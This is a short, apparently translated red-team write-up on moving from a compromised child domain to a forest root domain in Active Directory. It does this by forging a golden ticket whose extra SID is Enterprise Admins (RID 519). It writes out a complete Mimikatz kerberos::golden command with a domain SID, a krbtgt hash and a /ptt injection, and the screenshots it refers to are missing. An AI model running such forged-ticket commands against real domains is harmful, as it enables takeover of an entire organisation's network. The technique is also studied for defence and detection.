Suppose a forest whose root domain is zhong.czf, with domain controller dc.zhong.czf. pp.zhong.czf is a child domain under it (set up as a domain tree, its domain controller is pp.pp.zhong.czf), and ppo.pp.zhong.czf is a child domain below pp (set up within the same forest under pp).
This is the structure you get when a new domain is created beneath an existing domain that is already part of the forest.
Approach
Having obtained privileges in the ppo domain, I was only able to log on to the pp domain controller above it.
At this point the root domain controller can be reached, but we certainly do not have the rights for an IPC connection to it.
At the time I naively thought the following would succeed:
kerberos::golden /user:Administrator /domain:pp.zhong.czf /sid:S-1-5-21-3321026355-1170224481-604632441 /krbtgt:758c84a842111552468551c16662885f /sids:S-1-5-21-3267649711-2093864886-1768988539-519 /ptt
This is what happened:
The reason is that the second SID, the Enterprise Admins SID, was added incorrectly.
When it is done correctly, an extra SID should appear here.
What needs explaining: ppo is a member domain inside pp, so what is required is the SID of the pp.zhong.czf domain (for the domain admin) together with its krbtgt account; the second SID is the Enterprise Admins SID of the zhong.czf domain (RID 519).
The second one is the /sids parameter.
This is what it looks like when correct:
References
writeup http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/